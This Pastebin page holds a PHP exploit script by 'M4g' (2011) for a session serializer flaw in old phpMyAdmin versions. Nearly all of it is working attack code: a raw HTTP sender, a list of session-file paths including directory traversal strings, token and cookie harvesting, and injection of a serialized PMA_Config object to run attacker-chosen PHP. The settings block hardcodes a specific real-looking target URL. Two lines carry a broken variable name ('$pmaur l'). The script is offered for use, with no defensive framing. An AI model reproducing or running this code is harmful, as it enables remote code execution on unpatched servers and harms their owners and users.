Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- phpMyAdmin < 3.3.10.2 & < 3.4.3.1 Session Serializer arbitrary PHP code execution exploit
- by M4g, ICQ 884888, http://snipper.ru, (c) 2011
- ---
- PHP depending and settings on the target PMA installation: magic_quotes_gpc = off, PHP <= 5.2.13 & PHP <= 5.3.2
- ---
- Links & Thanks:
- 0. http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/
- 1. http://php-security.org/2010/05/31/mops-2010-060-php-session-serializer-session-data-injection-vulnerability/index.html
- 2. https://rdot.org/forum/showthread.php?t=286
- 3. http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
- 4. http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
- */
- /*Settings*/
- $pmaurl = 'http://l2rf.ru/myadmin/'; //full PMA url
- $payload = '<?php phpinfo(); ?>'; //PHP code to execute
- /*Settings*/
- /*-------------------------------------------EXPLOIT CODE-------------------------------------------*/
- $count_redirects = 0;
- $max_redirects = 5;
- //отправляем http-данные
- //$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent, other headers, timeout, what to show = (0-all, 1-body, 2-headers), redirect = 0|1
- function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = 'Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8', $other_headers= '', $timeout = 30, $show = 0, $follow_redirect=0)
- {
- global $count_redirects,$max_redirects;
- $return = '';
- $feof_count = 0;
- $parsed_url = parse_url($url);
- $site = $parsed_url['host'];
- $path = $parsed_url['path'];
- $query = $parsed_url['query'];
- if(preg_match('@_$@i',$query) && !preg_match('@_$@i',$url))
- $query = rtrim($query,'_');
- if(preg_match('@_$@i',$path) && !preg_match('@_$@i',$url))
- $path = rtrim($path,'_');
- ($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';
- ($method == 'GET' && !empty($query) && empty($data)) ? $path .= '?'.$query : '';
- ($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';
- if($fp = fsockopen($site, 80, $errno, $errstr, $timeout))
- {
- ($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
- $out .= "Host: $site\r\n";
- $out .= "Content-type: application/x-www-form-urlencoded\r\n";
- $out .= "Connection: Close\r\n";
- $out .= "User-Agent: $ua_string\r\n";
- !empty($referer_string) ? $out .= "Referer: $referer_string\r\n" : '';
- !empty($cookie_string) ? $out .= "Cookie: $cookie_string\r\n" : '';
- !empty($other_headers) ? $out .= $other_headers : '';
- ($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
- ($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);
- while (!feof($fp))
- {
- if($feof_count >=10000)
- break;
- $return .= fread($fp, 4800);
- ++$feof_count;
- }
- fclose($fp);
- if($follow_redirect)
- {
- if($count_redirects<$max_redirects)
- {
- if(preg_match('@Location: (.+)@i',$return,$redirect_match))
- {
- $count_redirects++;
- $return = send_data($method, $redirect_match[1], $data, $referer_string, $cookie_string, $ua_string, $other_headers, $timeout, $show, $follow_redirect);
- $count_redirects = 0;
- }
- }
- else
- return 'Max redirects = '.$max_redirects;
- }
- if($show == 1)
- {
- $return = explode("\r\n\r\n",$return);
- $return = $return[1];
- }
- elseif($show == 2)
- {
- $return = explode("\r\n\r\n",$return);
- $return = $return[0];
- }
- return $return;
- }
- else
- return array('errno' => $errno, 'errstr' => $errstr);
- }
- $pmaurl = rtrim($pmaurl,'/').'/index.php';
- //Regards to asddas
- $sess_path = array('/tmp/',
- '/var/tmp/',
- '/var/lib/php/',
- '/var/lib/php4/',
- '/var/lib/php5/',
- '/var/lib/php/session/',
- '/var/lib/php4/session/',
- '/var/lib/php5/session/',
- '/shared/sessions',
- '/var/php_sessions/',
- '/var/sessions/',
- '/tmp/php_sessions/',
- '/tmp/sessions/',
- '../../../tmp/',
- '../../../../tmp/',
- '../../../../../tmp/',
- '../../../../../../tmp/',
- '../../../../../../../tmp/',
- '../../../temp/',
- '../../../../temp/',
- '../../../../../temp/',
- '../../../../../../temp/',
- '../../../../../../../temp/',
- '../../../sessions/',
- '../../../../sessions/',
- '../../../../../sessions/',
- '../../../../../../sessions/',
- '../../../../../../../sessions/',
- '../../../phptmp/',
- '../../../../phptmp/',
- '../../../../../phptmp/',
- '../../../../../../phptmp/',
- '../../../../../../../phptmp/');
- //1. Token, Session name and Cookies
- $token_page = send_data('GET',$pmaurl);
- preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array);
- $token = $token_array[1];
- preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array);
- $cookie_array = $cookie_array[1];
- $cookie_array = implode("; ",$cookie_array);
- preg_match('@phpMyAdmin=([a-z0-9]{32,40});?@is',$token_page,$session_array);
- $session = $session_array[1];
- //2. Inject into session testing
- $sess_test_page = '';
- $o = 0;
- $good_inj = false;
- do
- {
- $inj = $sess_path[$o].'sess_'.$session;
- $query = $pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($inj).':"'.$inj.'";}}');
- $sess_test_page = send_data('GET',$query,'',$pmaurl,$cookie_array);
- $sess_test_page2 = send_data('GET',$pmaurl.'?token='.$token,'',$pmaur l,$cookie_array);
- if(stristr($sess_test_page2,'PMA_Config'))
- {
- $good_inj = $inj;
- flush();
- print '[+] '.$inj.' - good path<br/>';
- break;
- }
- else
- {
- flush();
- print '[-] '.$inj.' - bad path<br/>';
- }
- $o++;
- }
- while($o < count($sess_path));
- if($good_inj)
- {
- $query = $pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($good_inj).':"'.$good_inj.'";}}').'&_SESSION[payload]='.urlencode($payload);
- $sess_test_page = send_data('GET',$query,'',$pmaurl,$cookie_array);
- $sess_test_page2 = send_data('GET',$pmaurl.'?token='.$token,'',$pmaur l,$cookie_array);
- print $sess_test_page2;
- }
- else
- die('[+] Session path was not found');
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement